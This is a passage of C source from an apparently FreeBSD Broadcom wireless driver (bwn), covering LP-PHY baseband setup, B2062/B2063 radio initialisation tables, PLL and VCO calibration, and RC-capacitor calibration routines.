BWN_PHY_AFE_DAC_CTL, 0xf7ff); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL, 0); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL_OVR, 0); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_0, 0); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2, 0); BWN_PHY_SET(mac, BWN_PHY_AFE_DAC_CTL, 0x0004); BWN_PHY_SETMASK(mac, BWN_PHY_OFDMSYNCTHRESH0, 0xff00, 0x0078); BWN_PHY_SETMASK(mac, BWN_PHY_CLIPCTRTHRESH, 0x83ff, 0x5800); BWN_PHY_WRITE(mac, BWN_PHY_ADC_COMPENSATION_CTL, 0x0016); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_ADC_CTL_0, 0xfff8, 0x0004); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0x00ff, 0x5400); BWN_PHY_SETMASK(mac, BWN_PHY_HIGAINDB, 0x00ff, 0x2400); BWN_PHY_SETMASK(mac, BWN_PHY_LOWGAINDB, 0x00ff, 0x2100); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0xff00, 0x0006); BWN_PHY_MASK(mac, BWN_PHY_RX_RADIO_CTL, 0xfffe); for (i = 0; i < N(v1); i++) BWN_PHY_SETMASK(mac, v1[i].offset, v1[i].mask, v1[i].set); BWN_PHY_SETMASK(mac, BWN_PHY_INPUT_PWRDB, 0xff00, plp->plp_rxpwroffset); if ((siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM) && ((IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) || (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_LDO_PAREF))) { siba_cc_pmu_set_ldovolt(sc->sc_dev, SIBA_LDO_PAREF, 0x28); siba_cc_pmu_set_ldoparef(sc->sc_dev, 1); if (mac->mac_phy.rev == 0) BWN_PHY_SETMASK(mac, BWN_PHY_LP_RF_SIGNAL_LUT, 0xffcf, 0x0010); bwn_tab_write(mac, BWN_TAB_2(11, 7), 60); } else { siba_cc_pmu_set_ldoparef(sc->sc_dev, 0); BWN_PHY_SETMASK(mac, BWN_PHY_LP_RF_SIGNAL_LUT, 
0xffcf, 0x0020); bwn_tab_write(mac, BWN_TAB_2(11, 7), 100); } tmp = plp->plp_rssivf | plp->plp_rssivc << 4 | 0xa000; BWN_PHY_WRITE(mac, BWN_PHY_AFE_RSSI_CTL_0, tmp); if (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_RSSIINV) BWN_PHY_SETMASK(mac, BWN_PHY_AFE_RSSI_CTL_1, 0xf000, 0x0aaa); else BWN_PHY_SETMASK(mac, BWN_PHY_AFE_RSSI_CTL_1, 0xf000, 0x02aa); bwn_tab_write(mac, BWN_TAB_2(11, 1), 24); BWN_PHY_SETMASK(mac, BWN_PHY_RX_RADIO_CTL, 0xfff9, (plp->plp_bxarch << 1)); if (mac->mac_phy.rev == 1 && (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_FEM_BT)) { for (i = 0; i < N(v2); i++) BWN_PHY_SETMASK(mac, v2[i].offset, v2[i].mask, v2[i].set); } else if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan) || (siba_get_pci_subdevice(sc->sc_dev) == 0x048a) || ((mac->mac_phy.rev == 0) && (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM))) { for (i = 0; i < N(v3); i++) BWN_PHY_SETMASK(mac, v3[i].offset, v3[i].mask, v3[i].set); } else if (mac->mac_phy.rev == 1 || (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_FEM)) { for (i = 0; i < N(v4); i++) BWN_PHY_SETMASK(mac, v4[i].offset, v4[i].mask, v4[i].set); } else { for (i = 0; i < N(v5); i++) BWN_PHY_SETMASK(mac, v5[i].offset, v5[i].mask, v5[i].set); } if (mac->mac_phy.rev == 1 && (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_LDO_PAREF)) { BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_5, BWN_PHY_TR_LOOKUP_1); BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_6, BWN_PHY_TR_LOOKUP_2); BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_7, BWN_PHY_TR_LOOKUP_3); BWN_PHY_COPY(mac, BWN_PHY_TR_LOOKUP_8, BWN_PHY_TR_LOOKUP_4); } if ((siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_FEM_BT) && (siba_get_chipid(sc->sc_dev) == 0x5354) && (siba_get_chippkg(sc->sc_dev) == SIBA_CHIPPACK_BCM4712S)) { BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x0006); BWN_PHY_WRITE(mac, BWN_PHY_GPIO_SELECT, 0x0005); BWN_PHY_WRITE(mac, BWN_PHY_GPIO_OUTEN, 0xffff); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_PR45960W); } if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_LP_PHY_CTL, 0x8000); BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x0040); BWN_PHY_SETMASK(mac, BWN_PHY_MINPWR_LEVEL, 0x00ff, 0xa400); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xf0ff, 0x0b00); BWN_PHY_SETMASK(mac, BWN_PHY_SYNCPEAKCNT, 0xfff8, 0x0007); BWN_PHY_SETMASK(mac, BWN_PHY_DSSS_CONFIRM_CNT, 0xfff8, 0x0003); BWN_PHY_SETMASK(mac, BWN_PHY_DSSS_CONFIRM_CNT, 0xffc7, 0x0020); BWN_PHY_MASK(mac, BWN_PHY_IDLEAFTERPKTRXTO, 0x00ff); } else { BWN_PHY_MASK(mac, BWN_PHY_LP_PHY_CTL, 0x7fff); BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, 0xffbf); } if (mac->mac_phy.rev == 1) { tmp = BWN_PHY_READ(mac, BWN_PHY_CLIPCTRTHRESH); tmp2 = (tmp & 0x03e0) >> 5; tmp2 |= tmp2 << 5; BWN_PHY_WRITE(mac, BWN_PHY_4C3, tmp2); tmp = BWN_PHY_READ(mac, BWN_PHY_GAINDIRECTMISMATCH); tmp2 = (tmp & 0x1f00) >> 8; tmp2 |= tmp2 << 5; BWN_PHY_WRITE(mac, BWN_PHY_4C4, tmp2); tmp = BWN_PHY_READ(mac, BWN_PHY_VERYLOWGAINDB); tmp2 = tmp & 0x00ff; tmp2 |= tmp << 8; BWN_PHY_WRITE(mac, BWN_PHY_4C5, tmp2); } } struct bwn_b2062_freq { uint16_t freq; uint8_t value[6]; }; static void bwn_phy_lp_b2062_init(struct bwn_mac *mac) { #define CALC_CTL7(freq, div) \ (((800000000 * (div) + (freq)) / (2 * (freq)) - 8) & 0xff) #define CALC_CTL18(freq, div) \ ((((100 * (freq) + 16000000 * (div)) / (32000000 * (div))) - 1) & 0xff) #define CALC_CTL19(freq, div) \ ((((2 * (freq) + 1000000 * (div)) / (2000000 * (div))) - 1) & 0xff) struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_b2062_freq freqdata_tab[] = { { 12000, { 6, 6, 
6, 6, 10, 6 } }, { 13000, { 4, 4, 4, 4, 11, 7 } }, { 14400, { 3, 3, 3, 3, 12, 7 } }, { 16200, { 3, 3, 3, 3, 13, 8 } }, { 18000, { 2, 2, 2, 2, 14, 8 } }, { 19200, { 1, 1, 1, 1, 14, 9 } } }; static const struct bwn_wpair v1[] = { { BWN_B2062_N_TXCTL3, 0 }, { BWN_B2062_N_TXCTL4, 0 }, { BWN_B2062_N_TXCTL5, 0 }, { BWN_B2062_N_TXCTL6, 0 }, { BWN_B2062_N_PDNCTL0, 0x40 }, { BWN_B2062_N_PDNCTL0, 0 }, { BWN_B2062_N_CALIB_TS, 0x10 }, { BWN_B2062_N_CALIB_TS, 0 } }; const struct bwn_b2062_freq *f = NULL; uint32_t xtalfreq, ref; unsigned int i; bwn_phy_lp_b2062_tblinit(mac); for (i = 0; i < N(v1); i++) BWN_RF_WRITE(mac, v1[i].reg, v1[i].value); if (mac->mac_phy.rev > 0) BWN_RF_WRITE(mac, BWN_B2062_S_BG_CTL1, (BWN_RF_READ(mac, BWN_B2062_N_COM2) >> 1) | 0x80); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) BWN_RF_SET(mac, BWN_B2062_N_TSSI_CTL0, 0x1); else BWN_RF_MASK(mac, BWN_B2062_N_TSSI_CTL0, ~0x1); KASSERT(siba_get_cc_caps(sc->sc_dev) & SIBA_CC_CAPS_PMU, ("%s:%d: fail", __func__, __LINE__)); xtalfreq = siba_get_cc_pmufreq(sc->sc_dev) * 1000; KASSERT(xtalfreq != 0, ("%s:%d: fail", __func__, __LINE__)); if (xtalfreq <= 30000000) { plp->plp_div = 1; BWN_RF_MASK(mac, BWN_B2062_S_RFPLLCTL1, 0xfffb); } else { plp->plp_div = 2; BWN_RF_SET(mac, BWN_B2062_S_RFPLLCTL1, 0x4); } BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL7, CALC_CTL7(xtalfreq, plp->plp_div)); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL18, CALC_CTL18(xtalfreq, plp->plp_div)); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL19, CALC_CTL19(xtalfreq, plp->plp_div)); ref = (1000 * plp->plp_div + 2 * xtalfreq) / (2000 * plp->plp_div); ref &= 0xffff; for (i = 0; i < N(freqdata_tab); i++) { if (ref < freqdata_tab[i].freq) { f = &freqdata_tab[i]; break; } } if (f == NULL) f = &freqdata_tab[N(freqdata_tab) - 1]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL8, ((uint16_t)(f->value[1]) << 4) | f->value[0]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL9, ((uint16_t)(f->value[3]) << 4) | f->value[2]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL10, f->value[4]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL11, f->value[5]); #undef CALC_CTL7 #undef CALC_CTL18 #undef CALC_CTL19 } static void bwn_phy_lp_b2063_init(struct bwn_mac *mac) { bwn_phy_lp_b2063_tblinit(mac); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_SP5, 0); BWN_RF_SET(mac, BWN_B2063_COM8, 0x38); BWN_RF_WRITE(mac, BWN_B2063_REG_SP1, 0x56); BWN_RF_MASK(mac, BWN_B2063_RX_BB_CTL2, ~0x2); BWN_RF_WRITE(mac, BWN_B2063_PA_SP7, 0); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_SP6, 0x20); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_SP9, 0x40); if (mac->mac_phy.rev == 2) { BWN_RF_WRITE(mac, BWN_B2063_PA_SP3, 0xa0); BWN_RF_WRITE(mac, BWN_B2063_PA_SP4, 0xa0); BWN_RF_WRITE(mac, BWN_B2063_PA_SP2, 0x18); } else { BWN_RF_WRITE(mac, BWN_B2063_PA_SP3, 0x20); BWN_RF_WRITE(mac, BWN_B2063_PA_SP2, 0x20); } } static void bwn_phy_lp_rxcal_r2(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; static const struct bwn_wpair v1[] = { { BWN_B2063_RX_BB_SP8, 0x0 }, { BWN_B2063_RC_CALIB_CTL1, 0x7e }, { BWN_B2063_RC_CALIB_CTL1, 0x7c }, { BWN_B2063_RC_CALIB_CTL2, 0x15 }, { BWN_B2063_RC_CALIB_CTL3, 0x70 }, { BWN_B2063_RC_CALIB_CTL4, 0x52 }, { BWN_B2063_RC_CALIB_CTL5, 0x1 }, { BWN_B2063_RC_CALIB_CTL1, 0x7d } }; static const struct bwn_wpair v2[] = { { BWN_B2063_TX_BB_SP3, 0x0 }, { BWN_B2063_RC_CALIB_CTL1, 0x7e }, { BWN_B2063_RC_CALIB_CTL1, 0x7c }, { BWN_B2063_RC_CALIB_CTL2, 0x55 }, { BWN_B2063_RC_CALIB_CTL3, 0x76 } }; uint32_t freqxtal = siba_get_cc_pmufreq(sc->sc_dev) * 1000; int i; uint8_t tmp; tmp = BWN_RF_READ(mac, BWN_B2063_RX_BB_SP8) & 0xff; for (i = 0; i < 2; i++) BWN_RF_WRITE(mac, v1[i].reg, 
v1[i].value); BWN_RF_MASK(mac, BWN_B2063_PLL_SP1, 0xf7); for (i = 2; i < N(v1); i++) BWN_RF_WRITE(mac, v1[i].reg, v1[i].value); for (i = 0; i < 10000; i++) { if (BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2) break; DELAY(1000); } if (!(BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2)) BWN_RF_WRITE(mac, BWN_B2063_RX_BB_SP8, tmp); tmp = BWN_RF_READ(mac, BWN_B2063_TX_BB_SP3) & 0xff; for (i = 0; i < N(v2); i++) BWN_RF_WRITE(mac, v2[i].reg, v2[i].value); if (freqxtal == 24000000) { BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL4, 0xfc); BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL5, 0x0); } else { BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL4, 0x13); BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL5, 0x1); } BWN_RF_WRITE(mac, BWN_B2063_PA_SP7, 0x7d); for (i = 0; i < 10000; i++) { if (BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2) break; DELAY(1000); } if (!(BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2)) BWN_RF_WRITE(mac, BWN_B2063_TX_BB_SP3, tmp); BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL1, 0x7e); } static void bwn_phy_lp_rccal_r12(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct bwn_phy_lp_iq_est ie; struct bwn_txgain tx_gains; static const uint32_t pwrtbl[21] = { 0x10000, 0x10557, 0x10e2d, 0x113e0, 0x10f22, 0x0ff64, 0x0eda2, 0x0e5d4, 0x0efd1, 0x0fbe8, 0x0b7b8, 0x04b35, 0x01a5e, 0x00a0b, 0x00444, 0x001fd, 0x000ff, 0x00088, 0x0004c, 0x0002c, 0x0001a, }; uint32_t npwr, ipwr, sqpwr, tmp; int loopback, i, j, sum, error; uint16_t save[7]; uint8_t txo, bbmult, txpctlmode; error = bwn_phy_lp_switch_channel(mac, 7); if (error) device_printf(sc->sc_dev, "failed to change channel to 7 (%d)\n", error); txo = (BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVR) & 0x40) ? 1 : 0; bbmult = bwn_phy_lp_get_bbmult(mac); if (txo) tx_gains = bwn_phy_lp_get_txgain(mac); save[0] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_0); save[1] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_VAL_0); save[2] = BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVR); save[3] = BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVRVAL); save[4] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_2); save[5] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_2_VAL); save[6] = BWN_PHY_READ(mac, BWN_PHY_LP_PHY_CTL); bwn_phy_lp_get_txpctlmode(mac); txpctlmode = plp->plp_txpctlmode; bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); /* disable CRS */ bwn_phy_lp_set_deaf(mac, 1); bwn_phy_lp_set_trsw_over(mac, 0, 1); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffb); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x4); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfff7); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x8); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x10); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x10); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xffdf); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x20); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xffbf); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x40); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0x7); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0x38); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xff3f); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0x100); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfdff); BWN_PHY_WRITE(mac, BWN_PHY_PS_CTL_OVERRIDE_VAL0, 0); BWN_PHY_WRITE(mac, BWN_PHY_PS_CTL_OVERRIDE_VAL1, 1); BWN_PHY_WRITE(mac, BWN_PHY_PS_CTL_OVERRIDE_VAL2, 0x20); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfbff); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xf7ff); BWN_PHY_WRITE(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, 0); BWN_PHY_WRITE(mac, BWN_PHY_RX_GAIN_CTL_OVERRIDE_VAL, 0x45af); BWN_PHY_WRITE(mac, 
BWN_PHY_RF_OVERRIDE_2, 0x3ff); loopback = bwn_phy_lp_loopback(mac); if (loopback == -1) goto done; bwn_phy_lp_set_rxgain_idx(mac, loopback); BWN_PHY_SETMASK(mac, BWN_PHY_LP_PHY_CTL, 0xffbf, 0x40); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfff8, 0x1); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xffc7, 0x8); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xff3f, 0xc0); tmp = 0; memset(&ie, 0, sizeof(ie)); for (i = 128; i <= 159; i++) { BWN_RF_WRITE(mac, BWN_B2062_N_RXBB_CALIB2, i); sum = 0; for (j = 5; j <= 25; j++) { bwn_phy_lp_ddfs_turnon(mac, 1, 1, j, j, 0); if (!(bwn_phy_lp_rx_iq_est(mac, 1000, 32, &ie))) goto done; sqpwr = ie.ie_ipwr + ie.ie_qpwr; ipwr = ((pwrtbl[j - 5] >> 3) + 1) >> 1; npwr = bwn_phy_lp_roundup(sqpwr, (j == 5) ? sqpwr : 0, 12); sum += ((ipwr - npwr) * (ipwr - npwr)); if ((i == 128) || (sum < tmp)) { plp->plp_rccap = i; tmp = sum; } } } bwn_phy_lp_ddfs_turnoff(mac); done: /* restore CRS */ bwn_phy_lp_clear_deaf(mac, 1); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xff80); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfc00); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_VAL_0, save[1]); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_0, save[0]); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL_OVRVAL, save[3]); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL_OVR, save[2]); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2_VAL, save[5]); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2, save[4]); BWN_PHY_WRITE(mac, BWN_PHY_LP_PHY_CTL, save[6]); bwn_phy_lp_set_bbmult(mac, bbmult); if (txo) bwn_phy_lp_set_txgain(mac, &tx_gains); bwn_phy_lp_set_txpctlmode(mac, txpctlmode); if (plp->plp_rccap) bwn_phy_lp_set_rccap(mac); } static void bwn_phy_lp_set_rccap(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; uint8_t rc_cap = (plp->plp_rccap & 0x1f) >> 1; if (mac->mac_phy.rev == 1) rc_cap = MIN(rc_cap + 5, 15); BWN_RF_WRITE(mac, BWN_B2062_N_RXBB_CALIB2, MAX(plp->plp_rccap - 4, 0x80)); BWN_RF_WRITE(mac, BWN_B2062_N_TXCTL_A, rc_cap | 0x80); BWN_RF_WRITE(mac, BWN_B2062_S_RXG_CNT16, ((plp->plp_rccap & 0x1f) >> 2) | 0x80); } static uint32_t bwn_phy_lp_roundup(uint32_t value, uint32_t div, uint8_t pre) { uint32_t i, q, r; if (div == 0) return (0); for (i = 0, q = value / div, r = value % div; i < pre; i++) { q <<= 1; if (r << 1 >= div) { q++; r = (r << 1) - div; } } if (r << 1 >= div) q++; return (q); } static void bwn_phy_lp_b2062_reset_pllbias(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL2, 0xff); DELAY(20); if (siba_get_chipid(sc->sc_dev) == 0x5354) { BWN_RF_WRITE(mac, BWN_B2062_N_COM1, 4); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL2, 4); } else { BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL2, 0); } DELAY(5); } static void bwn_phy_lp_b2062_vco_calib(struct bwn_mac *mac) { BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL21, 0x42); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL21, 0x62); DELAY(200); } static void bwn_phy_lp_b2062_tblinit(struct bwn_mac *mac) { #define FLAG_A 0x01 #define FLAG_G 0x02 struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_b206x_rfinit_entry bwn_b2062_init_tab[] = { { BWN_B2062_N_COM4, 0x1, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_PDNCTL1, 0x0, 0xca, FLAG_G, }, { BWN_B2062_N_PDNCTL3, 0x0, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_PDNCTL4, 0x15, 0x2a, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENC, 0xDB, 0xff, FLAG_A, }, { BWN_B2062_N_LGENATUNE0, 0xdd, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENATUNE2, 0xdd, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENATUNE3, 0x77, 0xB5, FLAG_A | FLAG_G, }, { 
BWN_B2062_N_LGENACTL3, 0x0, 0xff, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENACTL7, 0x33, 0x33, FLAG_A | FLAG_G, }, { BWN_B2062_N_RXA_CTL1, 0x0, 0x0, FLAG_G, }, { BWN_B2062_N_RXBB_CTL0, 0x82, 0x80, FLAG_A | FLAG_G, }, { BWN_B2062_N_RXBB_GAIN1, 0x4, 0x4, FLAG_A | FLAG_G, }, { BWN_B2062_N_RXBB_GAIN2, 0x0, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_TXCTL4, 0x3, 0x3, FLAG_A | FLAG_G, }, { BWN_B2062_N_TXCTL5, 0x2, 0x2, FLAG_A | FLAG_G, }, { BWN_B2062_N_TX_TUNE, 0x88, 0x1b, FLAG_A | FLAG_G, }, { BWN_B2062_S_COM4, 0x1, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_S_PDS_CTL0, 0xff, 0xff, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL0, 0xf8, 0xd8, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL1, 0x3c, 0x24, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL8, 0x88, 0x80, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL10, 0x88, 0x80, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL0, 0x98, 0x98, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL1, 0x10, 0x10, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL5, 0x43, 0x43, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL6, 0x47, 0x47, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL7, 0xc, 0xc, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL8, 0x11, 0x11, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL9, 0x11, 0x11, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL10, 0xe, 0xe, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL11, 0x8, 0x8, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL12, 0x33, 0x33, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL13, 0xa, 0xa, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL14, 0x6, 0x6, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL18, 0x3e, 0x3e, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL19, 0x13, 0x13, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL21, 0x62, 0x62, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL22, 0x7, 0x7, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL23, 0x16, 0x16, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL24, 0x5c, 0x5c, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL25, 0x95, 0x95, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL30, 0xa0, 0xa0, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL31, 0x4, 0x4, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL33, 0xcc, 0xcc, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL34, 0x7, 0x7, FLAG_A | FLAG_G, }, { BWN_B2062_S_RXG_CNT8, 0xf, 0xf, FLAG_A, }, }; const struct bwn_b206x_rfinit_entry *br; unsigned int i; for (i = 0; i < N(bwn_b2062_init_tab); i++) { br = &bwn_b2062_init_tab[i]; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { if (br->br_flags & FLAG_G) BWN_RF_WRITE(mac, br->br_offset, br->br_valueg); } else { if (br->br_flags & FLAG_A) BWN_RF_WRITE(mac, br->br_offset, br->br_valuea); } } #undef FLAG_A #undef FLAG_B } static void bwn_phy_lp_b2063_tblinit(struct bwn_mac *mac) { #define FLAG_A 0x01 #define FLAG_G 0x02 struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_b206x_rfinit_entry bwn_b2063_init_tab[] = { { BWN_B2063_COM1, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM10, 0x1, 0x0, FLAG_A, }, { BWN_B2063_COM16, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM17, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM18, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM19, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM20, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM21, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM22, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM23, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM24, 0x0, 0x0, FLAG_G, }, { BWN_B2063_LOGEN_SP1, 0xe8, 0xd4, FLAG_A | FLAG_G, }, { BWN_B2063_LOGEN_SP2, 0xa7, 0x53, FLAG_A | FLAG_G, }, { BWN_B2063_LOGEN_SP4, 0xf0, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_SP1, 0x1f, 0x5e, FLAG_G, }, { BWN_B2063_G_RX_SP2, 0x7f, 0x7e, FLAG_G, }, { BWN_B2063_G_RX_SP3, 0x30, 
0xf0, FLAG_G, }, { BWN_B2063_G_RX_SP7, 0x7f, 0x7f, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_SP10, 0xc, 0xc, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_SP1, 0x3c, 0x3f, FLAG_A, }, { BWN_B2063_A_RX_SP2, 0xfc, 0xfe, FLAG_A, }, { BWN_B2063_A_RX_SP7, 0x8, 0x8, FLAG_A | FLAG_G, }, { BWN_B2063_RX_BB_SP4, 0x60, 0x60, FLAG_A | FLAG_G, }, { BWN_B2063_RX_BB_SP8, 0x30, 0x30, FLAG_A | FLAG_G, }, { BWN_B2063_TX_RF_SP3, 0xc, 0xb, FLAG_A | FLAG_G, }, { BWN_B2063_TX_RF_SP4, 0x10, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_PA_SP1, 0x3d, 0xfd, FLAG_A | FLAG_G, }, { BWN_B2063_TX_BB_SP1, 0x2, 0x2, FLAG_A | FLAG_G, }, { BWN_B2063_BANDGAP_CTL1, 0x56, 0x56, FLAG_A | FLAG_G, }, { BWN_B2063_JTAG_VCO2, 0xF7, 